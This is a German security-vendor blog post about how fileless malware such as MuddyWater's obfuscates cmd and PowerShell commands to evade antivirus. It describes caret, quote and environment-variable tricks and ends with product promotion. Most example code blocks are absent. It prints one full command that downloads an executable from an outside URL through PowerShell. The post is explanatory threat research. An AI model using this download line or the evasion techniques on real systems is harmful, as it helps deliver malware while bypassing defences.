Verschleierte dateilose Malware in den Toolkits der Cyberangreifer

Einführung

Dateilose Malware erfreut sich bei Cyberangreifern zunehmender Beliebtheit, da sie die Möglichkeiten des Verteidigers, bösartige Aktivitäten zu erkennen, einschränkt. Traditionell verlassen sich Cyberangreifer auf Verschleierungstechniken, um ihre bösartigen Aktivitäten zu verbergen und so lange wie möglich unentdeckt zu bleiben, aber Tools zur Bekämpfung der Verschleierung - in der Regel auf der Grundlage von Heuristiken, Aktivitätsüberwachung und Signaturen - können ihre versteckten Aktivitäten aufdecken und Angreifer ausbremsen. Bei dateilosen Angriffen wird nichts auf die Festplatte geschrieben, so dass es für die Verteidiger schwieriger ist, etwas zu finden.

Dateilose Angriffe können auch das Whitelisting umgehen, das nur die Ausführung vorab genehmigter Anwendungen zulässt, da sie sich auf integrierte Funktionen und bereits genehmigte Anwendungen stützen, die bereits installiert sind. Da IT-Techniker und Netzwerkadministratoren täglich Tools wie die Eingabeaufforderung (cmd), Powershell und Windows Management Instrumentation (WMI) verwenden, ist die Erkennung von Malware, die diese Tools ausnutzen soll, äußerst schwierig. Sicherheitsteams können diese Tools nicht blockieren, da sie für das Funktionieren der Unternehmensanwendungen erforderlich sind. In fast allen Fällen gibt es keine Alternativen.

Dateilose Malware ist auch einfacher zu erstellen und kann in verschiedenen Umgebungen und Betriebssystemen ohne oder mit nur geringen Änderungen ausgeführt werden. Dies macht sie zu billigen und zuverlässigen Werkzeugen für Angreifer, die sie entwickeln und nutzen können. Es gibt viele Toolkits und Projekte, die von Cyberangreifern unter Missachtung der Bedingungen oder Absichten ihrer Schöpfer verwendet werden können, z. B. Empire , PowerSploit und sogar Metasploit , mit deren Hilfe Angreifer neue, widerstandsfähige Malware erstellen können, die Antivirenprogramme umgehen, das Zielsystem ausnutzen und Daten exfiltrieren kann, in der Regel mit ein oder zwei Klicks.

Verpassen Sie nicht die neuesten Forschungsergebnisse des Mimecast Research Labs Teams. Abonnieren Sie noch heute die Cyber Resilience Insights .

Ein Beispiel für einen dateilosen Malware-Angriff ist die MuddyWater APT, die mehrere Verschleierungstechniken auf mehreren Ebenen einsetzt, um ihre bösartigen Aktivitäten zu verschleiern. Erstmals 2017 gemeldet , hatte MuddyWater Regierungen im Irak, in Saudi-Arabien, im Nahen Osten, in Europa und in den USA im Visier, und die Angriffe sind immer noch in freier Wildbahn zu finden. MuddyWater-Kampagnen zielen immer noch jeden Tag auf Regierungen und Organisationen ab, aber die Hacker, die dahinter stecken, sind weder die ersten noch die letzten, die die Strategie der dateilosen Malware anwenden.

In diesem Beitrag beschreibt Mimecast Research Labs dateilose Angriffe und die Verschleierungstechniken, die Angreifer einsetzen, um die Erkennung von dateiloser Malware durch Antiviren- (AV) und andere Sicherheitstools zu erschweren. Der Beitrag enthält Beispiele für einfache und fortgeschrittene Techniken, die in realen Angriffen verwendet wurden, einschließlich der Beschreibung einer neuartigen Technik, die bisher noch nicht beobachtet wurde, und wie Mimecast Targeted Threat Protection diese Techniken abwehren kann.

Übliche Verschleierungstechniken zur Umgehung von AV

Dateilose Malware kann als primäre Angriffsmethode oder als "First-Touch"-Vorstufe verwendet werden, die andere Nutzdaten von entfernten Quellen herunterlädt und ausführt. Um ihre Ziele zu erreichen, verwendet dateilose Malware verschiedene Arten von Verschleierungstechniken, um AV zu umgehen. Diese Techniken werden von allen Arten von Angreifern eingesetzt - von Amateuren bis hin zu gut organisierten staatlichen Gruppen. Das Ausmaß der Verschleierung, das von einfach bis fortgeschritten reicht, beeinflusst, wie oft die Malware von AV erkannt wird.

MuddyWater infiziert beispielsweise die Computer der Opfer, indem es ihnen manipulierte Microsoft Word-Dokumente sendet, die in bösartige Makros eingebettet sind. Die Makros führen verschleierten VBscript-Code aus, um in Microsoft Windows integrierte Tools wie mhta.exe, WScript oder WMI zu starten, um verschleierten Powershell-Code herunterzuladen und auszuführen. Der Einzeiler-Code entschlüsselt eine verschlüsselte Nutzlast und führt sie auf dem angegriffenen Computer aus. Die mehrschichtige Verschleierung verbirgt die bösartigen Fähigkeiten des Dokuments und umgeht die AV-Erkennung.

Zeichenverschleierung: Eine Möglichkeit, bösartige Zeichenfolgen und Befehle zu verschleiern, besteht in der Verwendung von Zeicheneinfügungstechniken, bei denen Sonderzeichen hinzugefügt werden, um bekannte erkannte Befehle komplexer zu machen. Diese Art der Verschleierung bricht wichtige Zeichenfolgen auf, so dass es für statische Schutzmaßnahmen und signaturbasierte Produkte schwieriger wird, bösartige Befehle zu analysieren.

Ein Beispiel für die Verschleierung durch Einfügen von Zeichen ist die Verwendung von Sonderzeichen wie Kommas (,) und Semikolons (;), die als Leerzeichen dienen und fast überall in einer Befehlszeile als Argument zulässig sind. Wie unten gezeigt, werden beide Zeichen häufig zusammen und getrennt verwendet:

Verwendung von Klammern zur Verschleierung: Eine weitere häufig anzutreffende Verschleierungstechnik ist die Verwendung von unnötigen Klammern, die dazu dienen, Ausdrücke zu gruppieren oder Befehle auf mehrere Zeilen aufzuteilen und den Code lesbarer zu machen. Die Variablen werden für den Codeblock so ausgewertet, als wäre der Befehl eine einzige Zeile. Angreifer nutzen diese Technik, um Befehle in verschiedenen Formen weiter zu verschleiern. Zum Beispiel:

Verwendung von Caret für Escape-basierte Obfuskation: Eine dritte häufig verwendete Obfuskationstechnik stützt sich auf das Sonderzeichen Caret (^), ein reserviertes Zeichen, das von Shells für Escape verwendet wird. Das Caret-Zeichen wird üblicherweise als einzelnes Sonderzeichen in einen Befehl eingefügt oder mit einem anderen Sonderzeichen gepaart, das während der Ausführung ein doppeltes Escape-Zeichen verursacht, wie im folgenden Beispiel gezeigt:

Nachdem das Caret-Zeichen der ersten Ebene entgangen ist, kann auch die zweite Ebene entgangen werden:

Schließlich führt der escaped-Befehl einen "powershell.exe"-Befehl mit einem Argument aus:

Verwendung von doppelten Anführungszeichen: Eine weitere grundlegende Technik bettet doppelte Anführungszeichen (") in einen Befehl ein. Ausgewogene doppelte Anführungszeichen, die in ein Befehlszeilenargument eingefügt werden, haben keinen Einfluss auf die Befehlsausführung; der Befehlszeilenparser verwendet jedoch das doppelte Anführungszeichen als Argumenttrennzeichen. Daher können doppelte Anführungszeichen böswillig für die Verkettung eines Arguments verwendet werden. Zum Beispiel:

Fortgeschrittene Verschleierungstechniken, um unentdeckt zu bleiben

Angreifer können auch die Umgebung ihrer Opfer ausnutzen, um Malware dynamisch zu verschleiern, wobei der Code bis zu seiner Ausführung verborgen bleibt. Diese Technik erschwert die Erkennung solcher Malware erheblich und gibt den Hackern eine größere Chance, das Katz-und-Maus-Spiel zu gewinnen.

Verwendung benutzerdefinierter Umgebungsvariablen: Eine Methode ist die Verwendung von Umgebungsvariablen, dynamischen Objekten, die editierbare Werte speichern, die von Windows-Softwareprogrammen verwendet werden können. Umgebungsvariablen verschleiern die Befehlszeile und teilen sie in verschiedene Zeichen und Zeichenketten auf. Eine einfache Möglichkeit, eine Umgebungsvariable zu verwenden, besteht darin, eine benutzerdefinierte Variable zu erstellen und ihre Werte dynamisch zu setzen. Dieser Wert kann dann zum Ausführen bösartiger Befehle verwendet werden:

Der genannte Befehl führt "powershell.exe" aus.

Verwendung von vorab zugewiesenen Umgebungsvariablen: Eine weitere Technik zur Verwendung von Umgebungsvariablen besteht darin, bestimmte Zeichen aus vorab zugewiesenen Windows-Umgebungsvariablen zu erhalten. Diese Zeichen werden über ihren Index referenziert und später für bösartige Zwecke verwendet. Im Folgenden wird diese Idee veranschaulicht:

"%CommonProgramFiles%" ist eine Standard-Umgebungsvariable in einem Windows-Betriebssystem. Diese Variable ist standardmäßig mit dem folgenden Wert vorbelegt: "C:\Program Files\Common Files". Dieser Wert kann mit der Indizierung verwendet werden, um ein bestimmtes Zeichen zu erhalten und es in Ausführungsbefehlen zu verwenden:

Die oben gezeigte Indizierung ruft ein einzelnes Zeichen, beginnend bei Index 3 von "%CommonProgramFiles%" ab. Das Ergebnis dieser Aktion ist ein einzelnes Zeichen "P", das später mit "owerShell.exe" verkettet wird, um "powershell.exe" und ein Ergebnis zu erhalten, das dann aufgerufen wird.

Die "cmd.exe" kann auch durch "%ComSpec%" ersetzt werden, eine vorab zugewiesene Umgebungsvariable, die standardmäßig den absoluten Pfad der "cmd.exe" speichert.

Spezielle Technik, die in unseren Labors gefunden wurde: Zum Schluss werden wir eine spezielle Technik behandeln, die vom Team der Mimecast Research Labs entdeckt wurde. Diese Technik verändert die Host-Umgebung, ohne einen "set"-Befehl zu verwenden. Stattdessen stützt sie sich auf einen "exit"-Befehl mit einem benutzerdefinierten Exit-Code und verwendet später das Ausführungsergebnis, um eine ASCII-Zeichen-Darstellung zu erhalten, die in der "%ExitCodeAscii%" Umgebungsvariablen geändert wird. Dieses ASCII-Zeichen wird verwendet, um einen Befehl auszuführen.

Um den richtigen Wert von "%ExitCodeAscii%" zu erhalten, muss der Befehl "exit" ausgeführt werden. Dies hat zur Folge, dass der Prozess, der ihn ausführt, beendet wird. Um dieses Hindernis zu überwinden, kann der Hacker "cmd.exe" in mehreren Ebenen verwenden und es missbrauchen, um das gewünschte Zeichen zu erhalten:

In diesem Beispiel führt das äußere cmd zwei andere cmd-Instanzen nacheinander aus. Die erste führt einen "exit 80"-Befehl aus und wird beendet. Infolgedessen wird die übergeordnete Umgebungsvariable "%ExitCodeAscii%" auf eine ASCII-Darstellung der Zahl 80 aktualisiert, die eigentlich das Zeichen "P" ist. Dieser "P"-Wert wird später von der zweiten cmd-Instanz verwendet, die die Verkettung von "P" und der "owershell" ausführt, die die Ausführung von "Powershell.exe" bewirkt.

Um den allgemeinen Mangel an Wissen über verschleierte Virenangriffe zu verdeutlichen, sehen Sie sich den beigefügten Screenshot von "Virustotal" an, in dem die Erkennungsrate einer Datei, die den Befehl ausführt, mit der eines Befehls verglichen wird, der verschleiert ist:

"C:\Windows\System32\cmd.exe /c powershell -bypass Invoke-Expression (New-Object System.Net.WebClient).DownloadFile("https://su.pr/7rnRZ6","C:\temp\m.exe")"

Nachwort

Angreifer investieren viel Zeit und Mühe, um ihre skrupellosen Aktivitäten zu verbergen, und bei diesen Operationen wird zunehmend dateilose Malware eingesetzt. Um unentdeckt zu bleiben und AV zu umgehen, verwenden Kriminelle in der Regel Verschleierungstechniken, um die Erkennung so schwierig wie möglich zu machen.

Mimecast Targeted Threat Protection wurde entwickelt, um die Verwendung dieser Technik zu erkennen und zu blockieren, indem es fortschrittliches Deep-Parsing und De-Obuscation einsetzt und jede analysierte Datei in Echtzeit analysiert.

Während dieser Bericht die Risiken aufzeigt, die mit der sich ständig verändernden Malware verbunden sind, die versucht, Tools zu unterwandern, die möglicherweise bereits in Ihrer Umgebung vorhanden sind, besteht die Chance, dass Sie diese Art von Angriffen im Laufe der Zeit entdecken, da Informationen zwischen verschiedenen Sicherheitsexperten und Plattformen ausgetauscht werden. Die Frage ist also klar: Ist diese Verzögerung für Ihr Unternehmen akzeptabel, da es auf Sekunden ankommt, wenn Angreifer Ihr Unternehmen ins Visier nehmen? Die Mimecast-Funktionen wurden entwickelt, um die Bedrohungen von morgen schon heute zu verhindern.